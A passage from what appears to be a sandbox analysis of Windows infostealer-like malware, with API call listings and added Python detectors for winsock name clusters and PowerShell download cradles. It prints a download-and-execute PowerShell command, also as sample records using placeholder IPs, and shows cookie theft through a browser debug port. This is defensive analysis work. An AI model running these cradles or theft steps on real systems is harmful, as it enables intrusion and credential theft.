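GetProcAddress (ws2_32.dll, WSAStartup, connect, getaddrinfo, ...).  In an
unpacked dump those names sit as adjacent NUL-terminated ASCII strings, so a
tight cluster of them is a quick triage signal for a hand-rolled network
stub.  Added example, not Joe Sandbox or sample code; the sample dump bytes
are constructed."""
import re
from dataclasses import dataclass
from typing import List, Tuple

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")   # printable runs, 4+ bytes

# Name sets per capability.  The winsock set is exactly what the report's
# ws2_32.dll routine resolves; add others (crypto, registry, ...) as needed.
CAPABILITY_SETS = {
    "winsock_raw_tcp": {
        b"ws2_32.dll", b"WSAStartup", b"WSACleanup", b"socket", b"connect",
        b"getaddrinfo", b"freeaddrinfo", b"htons", b"send", b"recv",
        b"closesocket",
    },
}


@dataclass(frozen=True)
class Cluster:
    capability: str
    start: int               # offset of the first name in the cluster
    end: int                 # offset one past the last name
    names: Tuple[str, ...]   # distinct names seen, sorted


def extract_strings(blob: bytes) -> List[Tuple[int, bytes]]:
    """(offset, run) for every printable ASCII run of 4+ bytes."""
    return [(m.start(), m.group()) for m in ASCII_RUN.finditer(blob)]


def find_clusters(blob: bytes, window: int = 512, min_names: int = 6) -> List[Cluster]:
    """Group exact name hits that fall within `window` bytes of the group's
    first hit; report groups holding at least `min_names` distinct names."""
    strings = extract_strings(blob)
    clusters: List[Cluster] = []
    for capability, names in CAPABILITY_SETS.items():
        hits = [(off, s) for off, s in strings if s in names]
        i = 0
        while i < len(hits):
            j = i
            while j + 1 < len(hits) and hits[j + 1][0] - hits[i][0] <= window:
                j += 1
            group = hits[i:j + 1]
            distinct = {s for _, s in group}
            if len(distinct) >= min_names:
                last_off, last_name = group[-1]
                clusters.append(Cluster(capability, group[0][0],
                                        last_off + len(last_name),
                                        tuple(sorted(n.decode() for n in distinct))))
            i = j + 1
    return clusters


# Constructed stand-in for an unpacked memory dump: a stub header, the
# winsock names packed together the way .rdata lays them out, some unrelated
# strings, and two stray "send"/"recv" far from the block.
WINSOCK_NAMES = [b"ws2_32.dll", b"connect", b"WSAStartup", b"getaddrinfo",
                 b"htons", b"WSACleanup", b"recv", b"socket", b"freeaddrinfo",
                 b"closesocket", b"send"]
SAMPLE_DUMP = (
    b"\x00" * 16 + b"MZ\x90\x00" + b"\x00" * 64
    + b"\x00".join(WINSOCK_NAMES) + b"\x00"
    + b"\x00" * 200 + b"lstrcpyA\x00lstrcatA\x00lstrlenA\x00"
    + b"\x00" * 2000 + b"send\x00" + b"\x00" * 1500 + b"recv\x00"
)

if __name__ == "__main__":
    for c in find_clusters(SAMPLE_DUMP):
        print(f"{c.capability}: {len(c.names)} names at 0x{c.start:x}-0x{c.end:x}")
```

Exact-match on whole runs is deliberate: "socket" inside "closesocket" must not count twice, and short generic names such as "send" only matter when they sit next to the rest of the set, which is why isolated hits far from the block are discarded.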
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071BE53
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0071BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0071BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071BEEB
                          • lstrlen.KERNEL32(')"), ref: 0071BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0071BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0071BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0071BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0071C00C
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: d9065632f286d9c398a21329f56c7fa1d5734dd6a3720f1e4ff24e169795fb07
                          • Instruction ID: f60f3fb93a2cc40de02c00cf37f5a8b10b777c509e3d7c946b563c43b886dc5a
                          • Opcode Fuzzy Hash: d9065632f286d9c398a21329f56c7fa1d5734dd6a3720f1e4ff24e169795fb07
                          • Instruction Fuzzy Hash: 9C619672A24255DBCB11AFBDDC8D69E7BE9AF04300F044525F805E3292DB3CD9468F91
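The routine above assembles a PowerShell download cradle and launches it through ShellExecuteEx: the image is C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (the 32-bit host, since the sample itself is 32-bit) and the parameters are -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')" with the URL supplied at runtime. The Python below is an added detection example written for this report, not Joe Sandbox or sample code: it scores PowerShell process-creation records for the pieces of that cradle, pulls out the URL, and notes a WoW64 host and an unusual parent. The record fields (modelled on Sysmon Event ID 1), the parent allowlist and the URLs in the sample records are constructed assumptions.

```python
r"""Detect the download-and-execute launch this sample performs through
ShellExecuteEx:
    powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
Added example, not Joe Sandbox or sample code.  The process-creation records
(Sysmon Event ID 1 style fields), the parent allowlist and the URLs are
constructed assumptions."""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Each indicator is one piece of the cradle seen in the call listing above.
INDICATORS = {
    "iex":                re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient_download": re.compile(r"net\.webclient\s*\)?\s*\.\s*download(?:string|file|data)", re.I),
    "no_profile":         re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I),
    "inline_command":     re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.I),
    "hidden_window":      re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I),
}
URL = re.compile(r"download(?:string|file|data)\(\s*['\"]([^'\"]+)['\"]", re.I)

# Assumption: parents that normally launch PowerShell interactively or via
# tasks; anything else spawning a cradle is treated as suspicious.
BENIGN_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                  "svchost.exe", "windowsterminal.exe", "code.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass
class Verdict:
    pid: int
    parent: str
    indicators: List[str] = field(default_factory=list)
    url: Optional[str] = None
    wow64: bool = False            # 32-bit host launched from SysWOW64
    suspicious_parent: bool = False

    @property
    def alert(self) -> bool:
        ind = set(self.indicators)
        # iex plus a WebClient download is the cradle itself; otherwise
        # require three of the weaker indicators together.
        return {"iex", "webclient_download"} <= ind or len(ind) >= 3


def basename(path: str) -> str:
    return path.replace("/", "\\").lower().rsplit("\\", 1)[-1]


def analyse(ev: dict) -> Optional[Verdict]:
    """Return a Verdict for a PowerShell process-creation record, else None."""
    if basename(ev["image"]) not in POWERSHELL:
        return None
    cmd = ev["cmdline"]
    v = Verdict(pid=ev["pid"], parent=basename(ev["parent_image"]))
    v.indicators = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    m = URL.search(cmd)
    v.url = m.group(1) if m else None
    v.wow64 = "\\syswow64\\" in ev["image"].replace("/", "\\").lower()
    v.suspicious_parent = v.parent not in BENIGN_PARENTS
    return v


def scan(records: Iterable[dict]) -> List[Verdict]:
    """Verdicts that alert, in record order."""
    out: List[Verdict] = []
    for ev in records:
        v = analyse(ev)
        if v is not None and v.alert:
            out.append(v)
    return out


# Constructed records: the sample's own launch, a scheduled-task script, an
# interactive admin command, a cradle variant from wscript, and a non-PowerShell
# process.  IPs are from the documentation ranges.
SAMPLE_RECORDS = [
    {"pid": 5012, "ppid": 4120,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\Downloads\file.exe",
     "cmdline": "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -c \"iex(New-Object Net.WebClient).DownloadString('http://198.51.100.23/update.ps1')\""},
    {"pid": 3300, "ppid": 1044,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"pid": 6104, "ppid": 2020,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -c \"Get-Process | Sort-Object CPU -Descending\""},
    {"pid": 7740, "ppid": 7700,
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "pwsh.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadFile('https://203.0.113.9/x.exe','C:\\Users\\Public\\x.exe')\""},
    {"pid": 1200, "ppid": 2020,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for v in scan(SAMPLE_RECORDS):
        print(f"pid={v.pid} parent={v.parent} wow64={v.wow64} url={v.url} {v.indicators}")
```

Two of the weaker signals are worth keeping even though they are common on their own: a 32-bit PowerShell on a 64-bit host is almost always spawned by a 32-bit loader rather than a user, and a parent outside the usual shells is what separates this launch from an administrator's one-liner that happens to use the same cmdlets.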
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072184F
                          • lstrlen.KERNEL32(010C6148), ref: 00721860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007218C1
                          • lstrlen.KERNEL32(00734FA0), ref: 007218D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007218F4
                          • lstrcat.KERNEL32(00000000,00734FA0), ref: 00721900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072192F
                          • lstrlen.KERNEL32(010C6008), ref: 00721945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007219A6
                          • lstrlen.KERNEL32(00734FA0), ref: 007219B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007219D9
                          • lstrcat.KERNEL32(00000000,00734FA0), ref: 007219E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A14
                          • lstrlen.KERNEL32(010C6018), ref: 00721A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A8B
                          • lstrlen.KERNEL32(010C6038), ref: 00721AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7bc15fbb60763f243ba0ee0fbababdd35f3b0f2ffbbdd1a2dc02cdc63f6504dd
                          • Instruction ID: 4bcb22ee685a984632bf4585fb02880a597b94b3d58444f1685c8f0a622fd808
                          • Opcode Fuzzy Hash: 7bc15fbb60763f243ba0ee0fbababdd35f3b0f2ffbbdd1a2dc02cdc63f6504dd
                          • Instruction Fuzzy Hash: 9D912EB1615713DBDB209FB9EC8CA17B7F8BF24300B548528B886D3292DB78E845DB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007147C5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714812
                          • lstrlen.KERNEL32(00734B60), ref: 0071481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071483A
                          • lstrcat.KERNEL32(00000000,00734B60), ref: 00714846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007148A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007148CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 007148DC
                          • lstrlen.KERNEL32(?), ref: 007148F0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714931
                          • lstrcpy.KERNEL32(00000000,?), ref: 007149B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 007149E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A5D
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 5c195d52ba2dc7a317bfa6b08d1b4ef85004efad35a82f1d8180f123ef47be18
                          • Instruction ID: 8a6cbdefc430d10076000c75588ea4d1f52c304bd950d893628f6e1747704950
                          • Instruction Fuzzy Hash: 28B17172A15206DBCB21EF7CD98DA9E77F5AF44700F058528FC45A7292DB38EC468B90
                          APIs
                            • Part of subcall function 007090C0: InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 007090DF
                            • Part of subcall function 007090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007090FC
                            • Part of subcall function 007090C0: InternetCloseHandle.WININET(00000000), ref: 00709109
                          • strlen.MSVCRT ref: 007092E1
                          • strlen.MSVCRT ref: 007092FA
                            • Part of subcall function 00708980: std::_Xinvalid_argument.LIBCPMT ref: 00708996
                          • strlen.MSVCRT ref: 00709399
                          • strlen.MSVCRT ref: 007093E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00709547
                          • lstrcat.KERNEL32(?,00731794), ref: 00709559
                          • lstrcat.KERNEL32(?,?), ref: 0070956A
                          • lstrcat.KERNEL32(?,00734B98), ref: 0070957C
                          • lstrcat.KERNEL32(?,?), ref: 0070958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0070959F
                          • lstrlen.KERNEL32(?), ref: 007095B6
                          • lstrlen.KERNEL32(?), ref: 007095DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00709614
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: 50b0175edda8ffa5331fb86de10e0c1f61fa0a051bd9bd14b94f0d7402daf2d0
                          • Instruction ID: dbda4f0a8e2c0a9221756882cac632a467172f5c2e5184662f8fd724b8b04402
                          • Instruction Fuzzy Hash: 19E11BB1E10218DBDF14DFA8D884ADEBBF5BF48300F108569E509A7282EB799E45CF51
                          APIs
                          • memset.MSVCRT ref: 0071D9A1
                          • memset.MSVCRT ref: 0071D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0071DA1C
                          • lstrcat.KERNEL32(?,010DD930), ref: 0071DA36
                          • lstrcat.KERNEL32(?,?), ref: 0071DA4A
                          • lstrcat.KERNEL32(?,010DCCB0), ref: 0071DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071DA95
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071DAFE
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 5cf3db6a9a47e8ef9b32765c73aaacee6ee48fa0d22bcc3f6562f58bdac1d22d
                          • Instruction ID: 976c8be03c71c4005205029597e59001ca53f01b705b5fcef570e98da7ed9000
                          • Instruction Fuzzy Hash: 8FB193B2914259DFDB20EF68DC889EE77B9AF48300F048564F905A7291DA789E45CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B3D9
                          • lstrlen.KERNEL32(00734C50), ref: 0070B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B474
                          • lstrcat.KERNEL32(00000000,00734C50), ref: 0070B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0070B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B587
                          • lstrlen.KERNEL32(00734AD4), ref: 0070B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B622
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0070B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B65E
                          • lstrlen.KERNEL32(?), ref: 0070B767
                          • lstrlen.KERNEL32(?), ref: 0070B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B79E
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: df81b7928afb033244a5d3eaf109c863d08e3da2b0e902d2f31475eb23f34208
                          • Instruction ID: cb5f4f9ba9e7e005f9adb98a30790df5e67cd6be0f95cc82988bb2e2a68edbed
                          • Instruction Fuzzy Hash: 89024171A15205CFCB25DF68D988B6AB7F1AF44304F188269E805AB3A2D779DD42DF80
                          APIs
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • RegOpenKeyExA.ADVAPI32(?,010DAF70,00000000,00020019,?), ref: 007237BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007237F7
                          • wsprintfA.USER32 ref: 00723822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00723840
                          • RegCloseKey.ADVAPI32(?), ref: 0072384E
                          • RegCloseKey.ADVAPI32(?), ref: 00723858
                          • RegQueryValueExA.ADVAPI32(?,010DE098,00000000,000F003F,?,?), ref: 007238A1
                          • lstrlen.KERNEL32(?), ref: 007238B6
                          • RegQueryValueExA.ADVAPI32(?,010DDF90,00000000,000F003F,?,00000400), ref: 00723927
                          • RegCloseKey.ADVAPI32(?), ref: 00723972
                          • RegCloseKey.ADVAPI32(?), ref: 00723989
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 32c73d73b140030b62e4379974ea306cb95a6eff9b19b42f463960a497cbb6ca
                          • Instruction ID: 7e3644be3be1067035d6fd3e5c7c0e8fcf4400b19c60cfbf7bdf582db1f0ea83
                          • Instruction Fuzzy Hash: 44919EB2904218DFCB14DFA4ED84A9EB7B9FB48310F148169F509BB251DB39AE45CF90
                          APIs
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 007090DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007090FC
                          • InternetCloseHandle.WININET(00000000), ref: 00709109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00709166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00709197
                          • InternetCloseHandle.WININET(00000000), ref: 007091A2
                          • InternetCloseHandle.WININET(00000000), ref: 007091A9
                          • strlen.MSVCRT ref: 007091BA
                          • strlen.MSVCRT ref: 007091ED
                          • strlen.MSVCRT ref: 0070922E
                          • strlen.MSVCRT ref: 0070924C
                            • Part of subcall function 00708980: std::_Xinvalid_argument.LIBCPMT ref: 00708996
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 139110dedbcd7ab50a7d602cbf40e925bd2e46fc174384ac9eb67cb4a55e980f
                          • Instruction ID: 34cf50d867d802eab6f32b0d8ad31ca1d6ba24daccfd7ddb8419bed80a5476e3
                          • Instruction Fuzzy Hash: DA51C6B1610209ABE724DBA8DC45BDEF7F9DB48710F140169F504E32C1DBB8EA448BA1
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007216A1
                          • lstrcpy.KERNEL32(00000000,010CB180), ref: 007216CC
                          • lstrlen.KERNEL32(?), ref: 007216D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007216F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00721704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072172A
                          • lstrlen.KERNEL32(010D9D18), ref: 0072173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721762
                          • lstrcat.KERNEL32(00000000,010D9D18), ref: 0072176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721792
                          • ShellExecuteEx.SHELL32(?), ref: 007217CD
                          • ExitProcess.KERNEL32 ref: 00721803
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: e70a2f10a37923a4d4b78244434c3cfb78c728f002c498bc57cee41c4fa8a57e
                          • Instruction ID: deebe60534859b81b8ce0b727d8280c2a0463c72314ddc975a2c716395ca66f7
                          • Instruction Fuzzy Hash: 2F519071A15229EBDB11DFA4DC88A9EB7F9BF94300F404125E905E3391DF78AE069F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0071F026
                          • lstrlen.KERNEL32(00000000), ref: 0071F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0071F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0071F081
                          • lstrlen.KERNEL32(?), ref: 0071F094
                          • lstrlen.KERNEL32(00000000), ref: 0071F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071F13F
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 3f0b194565ecc313dfdf39b844c8bec6f496f6a2640723b46bed791efcc4f14d
                          • Instruction ID: 88e7227e6c3e9124ea9277b64d8e0b55cc46424269e93d0cdc86274656a9a2d9
                          • Opcode Fuzzy Hash: 3f0b194565ecc313dfdf39b844c8bec6f496f6a2640723b46bed791efcc4f14d
                          • Instruction Fuzzy Hash: BF516372A24105DBCB21AF7CDC4DAAE77E5AF54300F058268FC45AB293DA38DC469B90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(010D8B40,00939BD8,0000FFFF), ref: 0070A026
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070A053
                          • lstrlen.KERNEL32(00939BD8), ref: 0070A060
                          • lstrcpy.KERNEL32(00000000,00939BD8), ref: 0070A08A
                          • lstrlen.KERNEL32(00734C4C), ref: 0070A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A0B2
                          • lstrcat.KERNEL32(00000000,00734C4C), ref: 0070A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A114
                          • SetEnvironmentVariableA.KERNEL32(010D8B40,00000000), ref: 0070A12F
                          • LoadLibraryA.KERNEL32(010DD308), ref: 0070A143
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: e6c89d8a9ab64762dd79b538216cea22de1b8d3573181bd644041467c1e3c3ec
                          • Instruction ID: 37788f9264be76873d132cf3cf8a1da6887c12532cd2a05fe264d5f295541c42
                          • Opcode Fuzzy Hash: e6c89d8a9ab64762dd79b538216cea22de1b8d3573181bd644041467c1e3c3ec
                          • Instruction Fuzzy Hash: C8919071A14704EFD731AFA4DC88A6737E6AB94705F404628F805872E2EFBDDD419B82
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071C8A2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0071C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071C932
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 0071C943
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 671aa43ed04ae219a44a2be752c6b062e7328be3731756eb5b5a34cb38233827
                          • Instruction ID: f14716d5881c984f14ec603ea62cc10dce30a4be1c68281bb49d34bf7903ee84
                          • Opcode Fuzzy Hash: 671aa43ed04ae219a44a2be752c6b062e7328be3731756eb5b5a34cb38233827
                          • Instruction Fuzzy Hash: D761C372E542199BDB13EFF8C889AEE7BF8AF05700F048165E841F7281D77C99468B90
                          APIs
                          • memset.MSVCRT ref: 0072451A
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00714F39), ref: 00724545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072454C
                          • wsprintfW.USER32 ref: 0072455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007245CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007245D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 007245E0
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID: 9Oq$%hs$9Oq
                          • API String ID: 3729781310-2764654981
                          • Opcode ID: a6df7a39cd31f083e98c9560f8f33913f52492a66eb2b469c72cc4184ffa9a5b
                          • Instruction ID: e96ad7a17a6676e4615c2973b40e620aa5c7fb2a5c8d6cf1b848093ff579a5b8
                          • Opcode Fuzzy Hash: a6df7a39cd31f083e98c9560f8f33913f52492a66eb2b469c72cc4184ffa9a5b
                          • Instruction Fuzzy Hash: 1C318F72A14215BBDB20DBE5EC89FDE77B8FF45700F104055FA05E7180EBB4AA418BA5
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00720CF0), ref: 00724276
                          • GetDesktopWindow.USER32 ref: 00724280
                          • GetWindowRect.USER32(00000000,?), ref: 0072428D
                          • SelectObject.GDI32(00000000,00000000), ref: 007242BF
                          • GetHGlobalFromStream.COMBASE(00720CF0,?), ref: 00724336
                          • GlobalLock.KERNEL32(?), ref: 00724340
                          • GlobalSize.KERNEL32(?), ref: 0072434D
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
